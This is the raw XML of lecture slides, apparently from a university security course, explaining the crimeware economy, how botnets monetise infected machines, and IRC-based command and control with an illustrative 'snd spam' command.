            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle: Rounded Corners 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6739DC6-B36D-489A-BCFA-643DCAEE5EAB}"/>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3908339E-1583-46AF-A390-A94A28E28DB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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rPr>
                <a:t>Zero-day Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="55" name="Group 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5FD889-3346-4CD8-A038-C5C40C956210}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9550956" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Rectangle: Rounded Corners 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08CBF0C-03A9-4452-A839-415F0248E337}"/>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B269B01C-5C1F-4067-AA5F-8E88FF7F55BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Crimeware</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59" name="Straight Connector 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA76E5D-33F4-4A5A-B745-17A391F4D76D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="53" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481636" y="1068185"/>
            <a:ext cx="0" cy="22949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1" name="Straight Connector 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D31171E-46D8-4B36-8CDE-5EB642F4D13A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10503171" y="1068185"/>
            <a:ext cx="0" cy="22949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2" name="Straight Connector 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B801004-FC82-43D0-BBB2-B7EA49575171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8925329" y="1297681"/>
            <a:ext cx="0" cy="30463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3" name="Straight Connector 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94C6349-1204-483B-BE52-BD95F8D8707B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7481637" y="1297681"/>
            <a:ext cx="3021534" cy="10176"/>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69" name="Rectangle 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D6170F-46E2-4F33-B4E8-2772E243B7B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8115910" y="2578575"/>
            <a:ext cx="1703748" cy="1205728"/>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76" name="Group 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40894DD1-ECDF-483A-B62D-198E51C83BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3699587" y="1923564"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050411" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rectangle: Rounded Corners 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E119D37-D620-41AC-B0E7-EB5491840D73}"/>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53F0EF3E-E5D5-47A7-B8F0-4AAB69871267}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389102" y="1411965"/>
              <a:ext cx="1875636"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rPr>
                <a:t>Bulletproof Hosting</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363540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From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Crimeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to Botnets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="4873999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infected machines are a fundamentally valuable resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unique IP addresses for spamming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bandwidth for DDoS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CPU cycles for bitcoin mining</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Early malware monetized these resources directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infection and monetization were tightly coupled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Botnets allow criminals to rent access to infected hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infrastructure as a service, i.e. the cloud for criminals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command and Control (C&amp;C) infrastructure for controlling bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables huge-scale criminal campaigns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385447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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20"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7" end="7"/>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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30"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1" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35"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36" dur="5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Old-School C&amp;C: IRC Channels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7140120" y="3291037"/>
            <a:ext cx="1576009" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>IRC Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6549945" y="1935651"/>
            <a:ext cx="1485920" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Botmaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2050" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5336268" y="2656114"/>
            <a:ext cx="715963" cy="7837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050" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6052230" y="2656114"/>
            <a:ext cx="647358" cy="7837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972475" y="3614057"/>
            <a:ext cx="3344628" cy="13062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808533" y="3614058"/>
            <a:ext cx="1508570" cy="14151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726563" y="3614058"/>
            <a:ext cx="609705" cy="14342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336267" y="3614058"/>
            <a:ext cx="308324" cy="14151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562621" y="3521870"/>
            <a:ext cx="136969" cy="15073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699589" y="3614058"/>
            <a:ext cx="781060" cy="14151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699590" y="3614058"/>
            <a:ext cx="1699089" cy="14151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699589" y="3614058"/>
            <a:ext cx="2617118" cy="14151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699589" y="3614057"/>
            <a:ext cx="3535150" cy="1371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890505" y="3614057"/>
            <a:ext cx="2426599" cy="1458686"/>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050" name="Picture 2" descr="D:\Classes\CS 4700\assets\devil-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676854"/>
            <a:ext cx="979261" cy="9792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Classes\CS 4700\assets\ser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572" y="3081338"/>
            <a:ext cx="881062" cy="8810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2180" y="4739996"/>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Classes\CS 4700\assets\ser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9057" y="3081338"/>
            <a:ext cx="881062" cy="881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209" y="4739996"/>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238" y="4739996"/>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6267" y="4739996"/>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296" y="4739996"/>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2325" y="4739996"/>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0354" y="4739996"/>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8383" y="4739996"/>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6415" y="4739996"/>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4151" y="4739996"/>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4" descr="D:\Projects\Finished Documents\MAE Assets\spam_icon8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3230" y="5519394"/>
            <a:ext cx="750780" cy="75078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D:\Projects\Finished Documents\MAE Assets\spam_icon8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5946" y="5519394"/>
            <a:ext cx="750780" cy="7507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D:\Projects\Finished Documents\MAE Assets\spam_icon8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8662" y="5519394"/>
            <a:ext cx="750780" cy="75078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D:\Projects\Finished Documents\MAE Assets\spam_icon8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1378" y="5519394"/>
            <a:ext cx="750780" cy="75078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D:\Projects\Finished Documents\MAE Assets\spam_icon8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4094" y="5519394"/>
            <a:ext cx="750780" cy="75078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D:\Projects\Finished Documents\MAE Assets\spam_icon8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6810" y="5519394"/>
            <a:ext cx="750780" cy="7507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D:\Projects\Finished Documents\MAE Assets\spam_icon8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9526" y="5519394"/>
            <a:ext cx="750780" cy="75078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D:\Projects\Finished Documents\MAE Assets\spam_icon8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2242" y="5519394"/>
            <a:ext cx="750780" cy="75078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D:\Projects\Finished Documents\MAE Assets\spam_icon8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4958" y="5519394"/>
            <a:ext cx="750780" cy="75078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D:\Projects\Finished Documents\MAE Assets\spam_icon8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77670" y="5519394"/>
            <a:ext cx="750780" cy="750780"/>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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="1683416" y="1602691"/>
            <a:ext cx="3033352" cy="1042535"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Rectangular Callout 65"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181602" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -78140"/>
                <a:gd name="adj2" fmla="val 9670"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="TextBox 66"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219203" y="4876799"/>
              <a:ext cx="5181602" cy="1267519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>snd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> spam: &lt;subject&gt; &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>msg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="68" name="Group 67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="1573230" y="2918619"/>
            <a:ext cx="3033352" cy="1042535"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="Rectangular Callout 68"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181602" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -63068"/>
                <a:gd name="adj2" fmla="val -4948"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="TextBox 69"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219203" y="4876799"/>
              <a:ext cx="5181602" cy="1267519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>snd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> spam: &lt;subject&gt; &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>msg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="71" name="Group 70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="7219708" y="2635276"/>
            <a:ext cx="3033352" cy="1042535"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="Rectangular Callout 71"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181602" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 62536"/>
                <a:gd name="adj2" fmla="val 9670"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="TextBox 72"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219203" y="4876799"/>
              <a:ext cx="5181602" cy="1267519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>snd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> spam: &lt;subject&gt; &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>msg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2067" name="Picture 5" descr="D:\Projects\Finished Documents\MAE Assets\Twitter_256x25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907" y="2960509"/>
            <a:ext cx="1122721" cy="11227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5" descr="D:\Projects\Finished Documents\MAE Assets\Twitter_256x25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6811" y="2960508"/>
            <a:ext cx="1122721" cy="11227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C813E5E-B6A1-43A8-99A9-95C61775BA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1903" y="4985657"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Picture 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22250AD8-BDF6-46DB-88F5-EDC637688C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5456" y="4985657"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Picture 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
